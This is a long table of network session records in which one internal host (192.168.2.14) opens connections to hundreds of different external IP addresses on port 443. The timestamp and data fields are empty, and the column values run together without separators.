                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14310192.168.2.1450024146.123.111.81443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14311192.168.2.143309060.156.119.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14312192.168.2.144533261.178.192.27443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14313192.168.2.1459746120.214.70.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14314192.168.2.1460390201.121.169.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14315192.168.2.1444986115.253.52.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14316192.168.2.1459168184.50.108.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14317192.168.2.144206477.138.252.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14318192.168.2.144025438.252.173.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14319192.168.2.1437088170.11.174.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14320192.168.2.1456096139.137.49.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14321192.168.2.143472025.254.35.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14322192.168.2.1444372118.250.103.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14323192.168.2.1444454216.78.167.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14324192.168.2.1448878114.37.66.199443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14325192.168.2.145184027.6.152.87443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14326192.168.2.1454332133.163.195.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14327192.168.2.1438956112.96.47.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14328192.168.2.1441762183.44.218.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14329192.168.2.145034019.149.138.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14330192.168.2.143709819.85.159.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14331192.168.2.146019492.97.217.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14332192.168.2.145759454.66.112.226443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14333192.168.2.145567239.78.183.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14334192.168.2.1450604122.235.235.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14335192.168.2.1457104113.150.238.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14336192.168.2.1456586152.152.44.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14337192.168.2.145268048.13.247.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14338192.168.2.1444946157.11.7.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14339192.168.2.145273065.233.89.224443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14340192.168.2.143556651.242.217.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14341192.168.2.1457290180.45.53.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14342192.168.2.1457950173.193.180.99443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14343192.168.2.1432804115.23.14.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14344192.168.2.1439184113.76.63.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14345192.168.2.145859448.179.10.213443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14346192.168.2.1446056179.28.65.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14347192.168.2.144503649.232.240.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14348192.168.2.145561065.161.180.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14349192.168.2.1456630194.14.30.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14350192.168.2.143616483.178.148.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14351192.168.2.1435250115.106.92.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14352192.168.2.1440090107.160.206.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14353192.168.2.144471271.11.89.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14354192.168.2.146022875.243.115.112443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14355192.168.2.1458962111.109.127.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14356192.168.2.1451520146.167.224.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14357192.168.2.143992477.93.131.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14358192.168.2.145976860.45.198.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14359192.168.2.143515660.237.30.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14360192.168.2.1444384124.81.154.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14361192.168.2.1444122202.164.69.251443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14362192.168.2.145788443.193.39.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14363192.168.2.1438722159.176.155.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14364192.168.2.145527845.150.97.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14365192.168.2.144634299.150.83.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14366192.168.2.145635664.182.227.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14367192.168.2.1436884110.208.103.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14368192.168.2.144412612.69.228.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14369192.168.2.1457414222.138.35.77443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14370192.168.2.1453650178.43.110.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14371192.168.2.1441336149.235.154.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14372192.168.2.144133679.26.215.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14373192.168.2.143528849.28.94.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14374192.168.2.144420431.57.106.51443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14375192.168.2.144160280.168.55.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14376192.168.2.1457616173.173.250.159443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14377192.168.2.1438096163.69.165.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14378192.168.2.145002275.78.168.254443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14379192.168.2.1457306163.217.64.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14380192.168.2.145698098.173.132.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14381192.168.2.1458366108.149.192.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14382192.168.2.145335668.216.129.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14383192.168.2.1458538165.120.200.9443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14384192.168.2.1440134176.181.142.125443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14385192.168.2.1450508208.118.135.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14386192.168.2.1456988123.240.137.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14387192.168.2.145528073.200.177.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14388192.168.2.1457998117.240.78.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14389192.168.2.1441188191.55.115.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14390192.168.2.144526276.194.77.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14391192.168.2.143956035.50.35.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14392192.168.2.1448998155.128.123.38443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14393192.168.2.1444572185.15.109.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14394192.168.2.1443836179.50.246.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14395192.168.2.145090696.121.81.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14396192.168.2.1453414163.176.165.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14397192.168.2.144848881.121.104.13443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14398192.168.2.1439008200.36.25.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14399192.168.2.144934039.124.205.15443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14400192.168.2.1440494223.109.88.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14401192.168.2.1456546223.17.39.90443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14402192.168.2.144213646.69.111.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14403192.168.2.143598852.220.201.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14404192.168.2.1451244223.29.11.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14405192.168.2.145447688.149.121.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14406192.168.2.1454414182.73.196.24443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14407192.168.2.143613874.145.192.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14408192.168.2.1453502130.137.221.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14409192.168.2.1458684114.244.244.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14410192.168.2.1440588132.193.41.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14411192.168.2.1433036206.122.186.110443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14412192.168.2.1437460166.45.208.240443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14413192.168.2.145065846.185.195.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14414192.168.2.14418924.81.97.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14415192.168.2.1452896223.24.193.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14416192.168.2.1456168223.204.32.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14417192.168.2.143904453.185.192.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14418192.168.2.1432922162.22.18.56443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14419192.168.2.1442996111.38.155.158443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14420192.168.2.144963682.176.50.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14421192.168.2.1457872101.90.44.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14422192.168.2.145142663.252.39.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14423192.168.2.144104275.190.138.88443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14424192.168.2.1443708193.250.45.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14425192.168.2.1438422201.85.133.71443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14426192.168.2.145755653.33.197.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14427192.168.2.1436096173.28.226.143443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14428192.168.2.1438962181.89.65.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14429192.168.2.1447206145.10.54.144443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14430192.168.2.1452584192.151.7.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14431192.168.2.1457086198.130.172.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14432192.168.2.1460366137.177.35.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14433192.168.2.145981468.129.196.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14434192.168.2.143902089.12.115.79443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14435192.168.2.1444626123.135.109.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14436192.168.2.145422869.128.1.193443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14437192.168.2.144523680.248.30.85443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14438192.168.2.143809886.111.62.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14439192.168.2.146038443.44.4.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14440192.168.2.1437230172.15.141.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14441192.168.2.1453372159.148.1.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14442192.168.2.145746837.199.131.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14443192.168.2.144796691.248.153.75443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14444192.168.2.1450148141.235.77.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14445192.168.2.14512048.161.226.250443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14446192.168.2.1436336113.8.189.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14447192.168.2.1447262195.69.140.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14448192.168.2.143312871.80.91.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14449192.168.2.145567641.65.199.116443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14450192.168.2.145311065.61.105.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14451192.168.2.1441300209.13.220.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14452192.168.2.143698662.132.174.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14453192.168.2.1449052189.220.32.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14454192.168.2.14484521.19.107.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14455192.168.2.1449590130.9.79.117443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14456192.168.2.144688023.127.161.127443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14457192.168.2.145711869.127.14.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14458192.168.2.1439774219.189.157.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14459192.168.2.1459190179.130.119.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14460192.168.2.1435998179.161.163.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14461192.168.2.143788477.225.173.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14462192.168.2.1445202198.224.102.115443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14463192.168.2.1457270113.138.59.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14464192.168.2.145045687.88.250.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14465192.168.2.143800460.209.124.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14466192.168.2.144506880.180.202.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14467192.168.2.1447082150.130.29.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14468192.168.2.1455424159.99.94.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14469192.168.2.1448184140.126.153.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14470192.168.2.1456394137.121.61.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14471192.168.2.143337084.239.88.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14472192.168.2.144240012.94.102.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14473192.168.2.143654893.127.40.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14474192.168.2.1435350102.72.46.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14475192.168.2.1446190178.176.237.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14476192.168.2.1435352108.82.74.248443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14477192.168.2.144513448.54.111.119443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14478192.168.2.143820652.200.205.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14479192.168.2.14475248.79.23.109443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14480192.168.2.1433102186.102.174.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14481192.168.2.1460156146.206.113.10443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14482192.168.2.143780085.220.68.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14483192.168.2.145667632.163.7.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14484192.168.2.1436832162.126.221.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14485192.168.2.143707043.61.247.242443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14486192.168.2.143659867.151.172.171443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14487192.168.2.1435522186.174.211.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14488192.168.2.143524425.14.154.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14489192.168.2.144838447.95.94.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14490192.168.2.145141057.138.41.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14491192.168.2.143834693.247.147.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14492192.168.2.14374568.55.38.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14493192.168.2.145151637.54.234.173443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14494192.168.2.144331658.81.24.114443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14495192.168.2.1435330198.29.86.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14496192.168.2.144138698.197.60.28443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14497192.168.2.143745424.223.107.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14498192.168.2.145648653.82.136.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14499192.168.2.1454730118.112.79.139443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14500192.168.2.1432798200.89.109.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14501192.168.2.1444118165.28.14.34443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14502192.168.2.1448012165.160.169.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14503192.168.2.1448182151.77.39.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14504192.168.2.1456766145.230.51.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14505192.168.2.1438260162.136.248.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14506192.168.2.146040693.234.42.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14507192.168.2.143727254.195.232.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14508192.168.2.144959861.116.12.162443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14509192.168.2.144328639.17.139.48443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14510192.168.2.1438948149.22.235.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14511192.168.2.1434526112.227.109.44443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14512192.168.2.1452532204.126.171.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14513192.168.2.144133217.55.165.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14514192.168.2.1437288181.222.144.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14515192.168.2.1460568106.128.125.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14516192.168.2.1437142152.176.167.183443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14517192.168.2.1436372102.23.151.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14518192.168.2.1446894129.5.235.82443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14519192.168.2.1447040104.193.81.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14520192.168.2.1434258172.116.206.141443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14521192.168.2.1443862124.236.166.147443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14522192.168.2.1459786205.235.43.62443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14523192.168.2.1444026186.43.194.126443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14524192.168.2.1444854148.235.118.93443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14525192.168.2.144715443.40.212.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14526192.168.2.143658813.15.247.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14527192.168.2.1447572190.155.38.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14528192.168.2.1453610141.137.17.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14529192.168.2.1454966219.111.33.149443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14530192.168.2.1458958141.153.155.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      14531192.168.2.1438798184.75.204.146443
                                      TimestampBytes transferredDirectionData


